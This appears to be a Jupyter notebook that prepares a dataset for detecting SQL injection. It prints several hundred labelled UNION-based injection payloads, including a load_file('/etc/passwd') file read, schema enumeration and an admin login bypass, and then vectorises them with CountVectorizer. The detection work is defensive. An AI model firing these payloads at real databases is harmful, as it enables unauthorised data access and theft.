In [3]:
import pandas as pd
import numpy as np

In [4]:
df= pd.read_excel(r'sqli.xlsx', engine='openpyxl')
df

,Query,Label,Unnamed: 2,Unnamed: 3,Unnamed: 4,Unnamed: 5,Unnamed: 6,Unnamed: 7
0,) union select * from information_schema.tab...,MD,NaN,NaN,NaN,NaN,NaN,NaN
1,"1 union all select 1,2,3,4,5,6,name from sysob...",MD,NaN,NaN,NaN,NaN,NaN,NaN
2,union all select @@version--,MD,NaN,NaN,NaN,NaN,NaN,NaN
3,union select * from users where login = cha...,MD,NaN,NaN,NaN,NaN,NaN,NaN
4,union select,MD,NaN,NaN,NaN,NaN,NaN,NaN
...,...,...,...,...,...,...,...,...
1994,"Their motto , large billboard stated &quot; W...",NV,NaN,NaN,NaN,NaN,NaN,NaN
1995,In wanted point danger even bigger ruins Schw...,NV,NaN,NaN,NaN,NaN,NaN,NaN
1996,Chatting many people passing &quot; construct...,NV,NaN,NaN,NaN,NaN,NaN,NaN
1997,"However , beginning resign town continues sta...",NV,NaN,NaN,NaN,NaN,NaN,NaN
1998,We told public statements made Mayor also imp...,NV,NaN,NaN,NaN,NaN,NaN,NaN

In [9]:
 from sklearn.feature_extraction.text import CountVectorizer
df_MD = [row['Query'] for index,row in df.iterrows() if row['Label'] == 'MD']
df_MD

[' )  union select * from information_schema.tables;',
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --",
 ' union all select @@version--',
 ' union select * from users where login  =  char ( 114,111,111,116 ) ;',
 ' union select',
 " union select 1,load_file ( '/etc/passwd' ) ,1,1,1;",
 ' union  ( select @@version )  --',
 ' union  ( select NULL,  ( select @@version  )  )   --',
 ' union  ( select NULL, NULL,  ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --',
 ' 1 + ( \\ )  union select null,@@VERSION -- 1',
 ' 1.&&1 union select 1,version (  )  -- 1',
 ' 1.&&@ union select 1,version (  )  -- 1',
 ' 1 +  ( \\. )  union select null,@@VERSION -- 1',
 ' 1.  union select 1,version (  )  -- 1',
 ' 1. union select 1,banner from v$version where rownum = 1 -- 1',
 '1.  union select version (  ) ,version (  )  -- 1',
 ' 1. union select null,version (  )  -- 1',
 ' 1 +\\. union select null,@@VERSION -- 1',
 ' 1. union select null,banner from v$version where rownum = 1 -- 1',
 '1.<@. union select 1,version (  )  -- 1',
 '1.*1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1.<1# union select 1,version (  )  -- 1',
 ' 1. <@ union select version (  ) ,version (  )  -- 1',
 ' 1.*\\ union select null,@@VERSION -- 1',
 ' 1.<@$ union select 1,version (  )  -- 1',
 ' 1.%@ union select 1,version (  )  -- 1',
 '11||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 '1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 +1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1 +1 union select null,banner from v$version where rownum = 1 -- 1',
 ' 11<1# union select 1,version (  )  -- 1',
 ' 1 +  ( \\+ )  union select null,@@VERSION -- 1',
 ' 1.<1# union select 1,version (  )  -- 1',
 ' 1 +\\+. union select null,@@VERSION -- 1',
 ' 1 -1<@ union select 1,version (  )  -- 1',
 ' 1 +1<@ union select version (  ) ,version (  )  -- 1',
 ' 1 +1<@ union select null,version (  )  -- 1',
 '  1 + \\+%1 union select null,@@VERSION -- 1',
 '1 + \\+*\\ union select null,@@VERSION -- 1',
 ' 1 + \\+*$ union select null,@@VERSION -- 1',
 ' 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1',
 ' 1 union select 1||1,version (  )  -- 1',
 ' 1 union select 1||@,version (  )  -- 1',
 ' 1 union select 1 1$,version (  )  -- 1',
 '1 union select 1 $,version (  )  -- 1',
 ' 1 union select 1 1a,version (  )  -- 1',
 '1 union select 1<@$,version (  )  -- 1',
 ' 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1 union select .1_,version (  )  -- 1',
 ' 1 union select 1`\\`,version (  )  -- 1',
 ' 1 union select 1a#,banner from v$version where rownum = 1 -- 1',
 ' 1 union select 1a,banner from v$version where rownum = 1 -- 1',
 ' 1 union select .1$_,version (  )  -- 1',
 '1 union select 1<@,version (  )  -- 1',
 ' 1 union select 1<@.,version (  )  -- 1',
 '1 union select 1 $$,version (  )  -- 1',
 '1 union select !<1,version (  )  -- 1',
 ' 1 union select +!<1,version (  )  -- 1',
 '1 union select +!<@,version (  )  -- 1',
 '1 union select !<@,version (  )  -- 1',
 '  1 union select @||1,version (  )  -- 1',
 ' 1 union select @&&@,version (  )  -- 1',
 ' 1 union select @ 1$,version (  )  -- 1',
 ' 1 union select  @ $,version (  )  -- 1',
 ' 1 union select @ 1a,version (  )  -- 1',
 ' 1 union select @<@$,version (  )  -- 1',
 ' 1   union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 union select @ _,version (  )  -- 1',
 ' 1 union select @ $_,version (  )  -- 1',
 ' 1 union select @<@,version (  )  -- 1',
 ' 1 union select @<@.,version (  )  -- 1',
 '1 union select @ $$,version (  )  -- 1',
 ' 1 +$ . union select null,@@VERSION -- 1',
 ' 1 +$ 1 union select null,@@VERSION -- 1',
 ' 1 +  ( $+ )  union select null,@@VERSION -- 1',
 ' 1 +$+. union select null,@@VERSION -- 1',
 ' 1 +$+ union select null,@@VERSION -- 1',
 '  1 + $+%1 union select null,@@VERSION -- 1',
 '1 + $+*\\ union select null,@@VERSION -- 1',
 ' 1 + $+*$ union select null,@@VERSION -- 1',
 ' * ( \\ )  union select null,@@VERSION -- 1',
 ' 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1<@.. union select 1,version (  )  -- 1',
 ' 1 <@. union select 1,version (  )  -- 1',
 ' 1  <@. union select version (  ) ,version (  )  -- 1',
 '1 *\\. union select null,@@VERSION -- 1',
 '1 <@.$ union select 1,version (  )  -- 1',
 '1 *1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1 *1 union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 <1## union select 1,version (  )  -- 1',
 ' 1 <@1$ union select 1,version (  )  -- 1',
 '1 *\\ union select null,@@VERSION -- 1',
 ' 1 *$ . union select null,@@VERSION -- 1',
 '  1 %$ 1 union select null,@@VERSION -- 1',
 ' 1 <@$_ union select 1,version (  )  -- 1',
 '1 | |1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1<@<@ union select 1,version (  )  -- 1',
 '1 <@<@ union select version (  ) ,version (  )  -- 1',
 ' 1 <@<@ union select null,version (  )  -- 1',
 ' 1 <@&@ union select 1,version (  )  -- 1',
 ' 1 <@$$ union select 1,version (  )  -- 1',
 " '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'",
 ' \'1\' union select ";"_,version (  )  -- 1\'',
 ' \'1\' union select $["],@@VERSION -- 1\'',
 ' \'1\' union select "?"_,version (  )  -- 1\'',
 "1' union select ||/1,version (  )  -- 1'",
 " '1' union select  ( \\ ) ,@@VERSION -- 1'",
 "1' union select  ( \\. ) ,@@VERSION -- 1'",
 " '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'",
 " '1' union select \\,@@VERSION -- 1'",
 " '1' union select \\.,@@VERSION -- 1'",
 "1' union select \\.#,@@VERSION -- 1'",
 "1' union select \\.%1,@@VERSION -- 1'",
 " '1' union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' union select 1a,banner from v$version where rownum = 1 -- 1'",
 ' \'1\' union select 1"!",banner from v$version where rownum = 1 -- 1\'',
 " '1' union select \\#,@@VERSION -- 1'",
 " '1' union select $ .,@@VERSION -- 1'",
 "1' union select $ _,@@VERSION -- 1'",
 " '1' union select $*$,@@VERSION -- 1'",
 " '1' union select +\\,@@VERSION -- 1'",
 " '1' union select +\\.,@@VERSION -- 1'",
 " '1' union select !<1,version (  )  -- 1'",
 " '1' union select +\\#,@@VERSION -- 1'",
 " '1' union select !<@,version (  )  -- 1'",
 "1' union select @ 1,version (  )  --  1'",
 " '1'   union select null,banner from v$version where rownum = 1 -- 1'",
 "1' union select @ @1,version (  )  --  1'",
 ' \'1\' union select "["_,version (  )  -- 1\'',
 " '1' +  ( \\ )  union select 1,@@VERSION -- 1'",
 " '1' +  ( \\. )  union select 1,@@VERSION -- 1'",
 " '1' * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1'<@.. union select 1,version (  )  -- 1'",
 " '1' <@._ union select 1,version (  )  -- 1'",
 " '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' + @<@# union select 1,version (  )  -- 1'",
 " '1' + $ . union select 1,@@VERSION -- 1'",
 "1' <@$_ union select 1,version (  )  -- 1'",
 " '1' <@&1 union select 1,version (  )  -- 1'",
 "1' <@<@ union select 1,version (  )  -- 1'",
 " '1' + $+*$ union select 1,@@VERSION -- 1'",
 " '1' %!<@ union select 1,version (  )  -- 1'",
 " '1'<@$$ union select 1,version (  )  -- 1'",
 " '1' + @ ( 1 )  union select 1,version (  )  -- 1'",
 " '1' + @ 1 union select 1,version (  )  -- 1'",
 " '1' + @ 1! union select 1,version (  )  -- 1'",
 " '1' + @ @1 union select 1,version (  )  -- 1'",
 ' 1 + @`\\` union select 1,version (  )  -- 1',
 ' 1 + @<1# union select 1,version (  )  -- 1',
 ' 1 + @<@. union select 1,version (  )  -- 1',
 '1 -@<@ union select 1,version (  )  -- 1',
 '1 -@<@ union select version (  ) ,version (  )  -- 1',
 ' 1 -@<@ union select null,version (  )  -- 1',
 ' 1 + @<@# union select null,version (  )  -- 1',
 "1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
 '1234 " AND 1 = 0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',
 '\\x27UNION SELECT',
 "' UNION SELECT",
 "' UNION ALL SELECT",
 ' UNION ALL SELECT',
 ' union select',
 ' union select * from users where login  =  char ...',
 "' UNION SELECT",
 "' UNION ALL SELECT",
 ' UNION 1=1 ;',
 "' UNION 1=1 #",
 "' UNION 1=1 -- --",
 "' UNION 1=1 -- #",
 "' UNION 1=1 -- %",
 "' UNION 1=1 -- '",
 "' UNION 1=2 ;",
 "' UNION 1=2 #",
 "' UNION 1=2 -- --",
 "' UNION 1=2 -- #",
 "' UNION 1=2 -- %",
 "' UNION 1=2 -- '",
 "' UNION 2=1 ;",
 "' UNION 2=1 #",
 "' UNION 2=1 -- --",
 "' UNION 2=1 -- #",
 "' UNION 2=1 -- %",
 "' UNION 2=1 -- '",
 "' UNION 2=2 ;",
 "' UNION 2=2 #",
 "' UNION 2=2 -- --",
 "' UNION 2=2 -- #",
 "' UNION 2=2 -- %",
 "' UNION 2=2 -- '",
 "' UNION a=a ;",
 "' UNION a=a #",
 "' UNION a=a -- --",
 "' UNION a=a -- #",
 "' UNION a=a -- %",
 "' UNION a=a -- '",
 "' UNION a=b ;",
 "' UNION a=b #",
 "' UNION a=b -- --",
 "' UNION a=b -- #",
 "' UNION a=b -- %",
 "' UNION a=b -- '",
 "' UNION b=a ;",
 "' UNION b=a #",
 "' UNION b=a -- --",
 "' UNION b=a -- #",
 "' UNION b=a -- %",
 "' UNION b=a -- '",
 "' UNION b=b ;",
 ' UNION b=b # ',
 ' UNION b=b -- --',
 " ' UNION b=b -- #",
 " ' UNION b=b -- %",
 "  ' union all select 1=1 ; ",
 ' union all select 1=1 # ',
 ' union all select 1=1 -- --',
 " ' union all select 1=1 -- # ",
 " ' union all select 1=1 -- % ",
 " ' union all select 1=1 -- '",
 " ' union all select 1=2 ; ",
 "  ' union all select 1=2 #",
 "  ' union all select 1=2 -- -- ",
 ' union all select 1=2 -- #',
 "' union all select 1=2 -- %",
 "' union all select 1=2 -- '",
 "' union all select 2=1 ;",
 "' union all select 2=1 #",
 "' union all select 2=1 -- --",
 "' union all select 2=1 -- #",
 "' union all select 2=1 -- %",
 "' union all select 2=1 -- '",
 "' union all select 2=2 ;",
 "' union all select 2=2 #",
 "' union all select 2=2 -- --",
 "' union all select 2=2 -- #",
 "' union all select 2=2 -- %",
 "' union all select 2=2 -- '",
 "' union all select a=a ;",
 "' union all select a=a #",
 "' union all select a=a -- --",
 "' union all select a=a -- #",
 "' union all select a=a -- %",
 "' union all select a=a -- '",
 ' union all select a=b ;',
 "' union all select a=b #",
 "' union all select a=b -- --",
 "' union all select a=b -- #",
 "' union all select a=b -- %",
 "' union all select a=b -- '",
 "' union all select b=a ;",
 "' union all select b=a #",
 "' union all select b=a -- --",
 "' union all select b=a -- #",
 "' union all select b=a -- %",
 "' union all select b=a -- '",
 "' union all select b=b ;",
 "' union all select b=b #",
 " ' union all select b=b -- -- ",
 " ' union all select b=b -- #",
 " ' union all select b=b -- %",
 " ' union select 1,2 -- 1=1 ;",
 " ' union select 1,2 -- 1=1 # ",
 " ' union select 1,2 -- 1=1 -- --",
 " ' union select 1,2 -- 1=1 -- #",
 "' union select 1,2 -- 1=2 ;",
 "' union select 1,2 -- 1=2 #",
 "' union select 1,2 -- 1=2 -- --",
 "' union select 1,2 -- 1=2 -- #",
 "' union select 1,2 -- 1=2 -- %",
 "' union select 1,2 -- 1=2 -- '",
 "' union select 1,2 -- 2=1 ;",
 " ' union select 1,2 -- 2=1 #",
 "' union select 1,2 -- 2=1 -- --",
 "' union select 1,2 -- 2=1 -- #",
 "' union select 1,2 -- 2=1 -- %",
 "' union select 1,2 -- 2=1 -- '",
 "' union select 1,2 -- 2=2 ;",
 "' union select 1,2 -- 2=2 #",
 ' union select 1,2 -- 2=2 ----',
 'union select 1,2 -- 2=2 -- #',
 "' union select 1,2 -- 2=2 -- %",
 "' union select 1,2 -- 2=2 -- '",
 "' union select 1,2 -- a=a ;",
 "' union select 1,2 -- a=a #",
 "' union select 1,2 -- a=a -- --",
 "' union select 1,2 -- a=a -- #",
 ' union select 1,2 -- a=a -- %',
 " union select 1,2 -- a=a --'",
 "' union select 1,2 -- a=b ;",
 "' union select 1,2 -- a=b #",
 "' union select 1,2 -- a=b -- --",
 "' union select 1,2 -- a=b -- #",
 "' union select 1,2 -- a=b -- %",
 "' union select 1,2 -- a=b -- '",
 "' union select 1,2 -- b=a ;",
 "' union select 1,2 -- b=a #",
 " ' union select 1,2 -- b=a ----",
 " ' union select 1,2 -- b=a -- # ",
 " ' union select 1,2 -- b=a -- % ",
 " ' union select 1,2 -- b=a -- ' ",
 ' union select 1,2 -- b=b ;',
 " ' union select 1,2 -- b=b # ",
 " ' union select 1,2 -- b=b -- -- ",
 " ' union select 1,2 -- b=b -- #",
 " ' union select 1,2 -- b=b -- %' ",
 "union select 1,2 -- b=b --'",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 #",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 #",
 ' UNION ALL SELECT@@datadir, 1 -- 1=2 -- --',
 ' UNION ALL SELECT @@datadir, 1 -- 1=2 -- #',
 ' UNION ALL SELECT @@datadir, 1 -- 1=2 -- %',
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- a=a ;",
 "' UNION ALL SELECT @@datadir, 1 -- a=a #",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- --",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- #",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- %",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- '",
 "' UNION ALL SELECT @@datadir, 1 -- a=b ;",
 "' UNION ALL SELECT @@datadir, 1 -- a=b #",
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- --",
 ' UNION ALL SELECT @@datadir, 1 -- a=b -- #',
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- %",
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- '",
 "' UNION ALL SELECT @@datadir, 1 -- b=a ;",
 "' UNION ALL SELECT @@datadir, 1 -- b=a #",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- --",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- #",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- %",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- '",
 "' UNION ALL SELECT @@datadir, 1 -- b=b ;",
 "' UNION ALL SELECT @@datadir, 1 -- b=b #",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- --",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- #",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- %",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- '",
 " ' union select 1 -- b=a -- - - ",
 ' union select 1 -- b=a -- # ',
 " ' union select 1 -- b=a -- % ",
 " ' union select 1 -- b=a -- '",
 " ' union select 1 -- b=b ; ",
 " ' union select 1 -- b=b # ",
 " ' union select 1 -- b=b -- - -",
 " ' union select 1 -- b=b -- # ",
 " ' union select 1 -- b=b -- %",
 " ' union select 1 -- b=b -- '",
 "union all select b=b -- ' ",
 ' union select 1 -- 1=1 ; ',
 ' union select 1 -- 1=1 #',
 " ' union select 1 -- 1=1 -- - -",
 " ' union select 1 -- 1=1 -- # ",
 ' union select 1 -- 1=1 -- % ',
 " union select 1 -- 1=1 -- ' ",
 ' union select 1 -- 1=2 ; ',
 ' union select 1 -- 1=2 # ',
 ' union select 1 -- 1=2 -- - - ',
 ' union select 1 -- 1=2 -- #',
 " ' union select 1 -- 1=2 -- % ",
 " union select 1 -- 1=2 -- '",
 " ' union select 1 -- 2=1 ; ",
 ' union select 1 -- 2=1 #',
 " ' union select 1 -- 2=1 -- - - ",
 ' union select 1 -- 2=1 -- # ',
 ' union select 1 -- 2=1 -- % ',
 " union select 1 -- 2=1 -- ' ",
 ' union select 1 -- 2=2 ; ',
 ' union select 1 -- 2=2 # ',
 ' union select 1 -- 2=2 -- - - ',
 " union select 1 -- 2=2 -- # '",
 ' union select 1 -- 2=2 -- % ',
 " union select 1 -- 2=2 -- ' ",
 ' union select 1 -- a=a -- % ',
 " union select 1 -- a=a -- ' ",
 ' union select 1 -- a=b ;',
 " ' union select 1 -- a=b #",
 " ' union select 1 -- a=b -- - - ",
 ' union select 1 -- b=a -- # ',
 ' union select 1 -- b=a -- % ',
 " union select 1 -- b=a -- ' ",
 ' union select 1 -- b=b ; ',
 ' union select 1 -- b=b #',
 " ' union select 1 -- b=b -- - - ",
 ' union select 1 -- b=b -- # ',
 ' union select 1 -- b=b -- % ',
 "' union select 1 -- b=b -- '",
 ' union select 1 -- a=a ; ',
 ' union select 1 -- a=a # ',
 ' union select 1 -- a=a -- -- ',
 "' union select 1 -- a=a -- #",
 " UNION b=b -- ' ",
 ' UNION select 1=1 ;',
 " ' UNION select 1=1 # ",
 " ' UNION select 1=1 -- -- ",
 " ' UNION select 1=1 -- # ",
 " ' UNION select 1=1 -- % ",
 " ' UNION select 1=1 -- ' ",
 " ' UNION select 1=2 ; ",
 " ' UNION select 1=2 # ",
 " ' UNION select 1=2 -- -- ",
 " ' UNION select 1=2 -- # ",
 " ' UNION select 1=2 -- % ",
 " ' UNION select 1=2 -- '",
 " ' UNION select 2=1 ; ",
 " ' UNION select 2=1 # ",
 " ' UNION select 2=1 -- -- ",
 ' UNION select 2=2 -- --',
 ' UNION select 2=1 -- #',
 ' UNION select 2=2 -- %',
 "' UNION select 2=2 -- '",
 ' UNION select a=a ;',
 ' UNION select a=a #',
 "' UNION select a=a -- --",
 "' UNION select a=a -- #",
 "' UNION select a=a -- %",
 "' UNION select a=a -- '",
 "' UNION select a=b ;",
 "' UNION select a=b #",
 "' UNION select a=b -- --",
 "' UNION select a=b -- #",
 "' UNION select a=b -- %",
 "' UNION select a=b -- '",
 "' UNION select b=a ;",
 "' UNION select b=a #",
 "' UNION select b=a -- --",
 "' UNION select b=a -- #",
 "' UNION select b=a -- %",
 "' UNION select b=a -- '",
 "' UNION select b=b ;",
 "' UNION select b=b #",
 "' UNION select b=b -- --",
 "' UNION select b=b -- #",
 "' UNION select b=b -- %",
 "' UNION select b=b -- '",
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --"]

In [13]:
vec = CountVectorizer()

In [23]:
l=vec.fit_transform(df_MD)
print(l.toarray())

[[0 0 0 ... 0 0 0]
 [0 0 0 ... 1 0 1]
 [0 0 0 ... 0 0 0]
 ...
 [0 0 0 ... 0 0 0]
 [0 0 0 ... 0 0 0]
 [0 0 0 ... 1 0 1]]

In [15]:
 print(vec.get_feature_names())

['11', '111', '114', '116', '1234', '1_', '1a', '81dc9bdb52d04dc20036dbd8313ed055', 'admin', 'all', 'and', 'banner', 'char', 'datadir', 'etc', 'from', 'information_schema', 'load_file', 'login', 'name', 'null', 'passwd', 'rownum', 'select', 'sysobjects', 'tables', 'union', 'users', 'version', 'where', 'x27union', 'xtype']

In [20]:
# print(l.toarray())
table_MD=pd.DataFrame(l.toarray(), columns=vec.get_feature_names())
table_MD

,11,111,114,116,1234,1_,1a,81dc9bdb52d04dc20036dbd8313ed055,admin,all,...,rownum,select,sysobjects,tables,union,users,version,where,x27union,xtype
0,0,0,0,0,0,0,0,0,0,0,...,0,1,0,1,1,0,0,0,0,0
1,0,0,0,0,0,0,0,0,0,1,...,0,1,1,0,1,0,0,1,0,1
2,0,0,0,0,0,0,0,0,0,1,...,0,1,0,0,1,0,1,0,0,0
3,0,2,1,1,0,0,0,0,0,0,...,0,1,0,0,1,1,0,1,0,0
4,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
450,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
451,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
452,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
453,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
454,0,0,0,0,0,0,0,0,0,1,...,0,1,1,0,1,0,0,1,0,1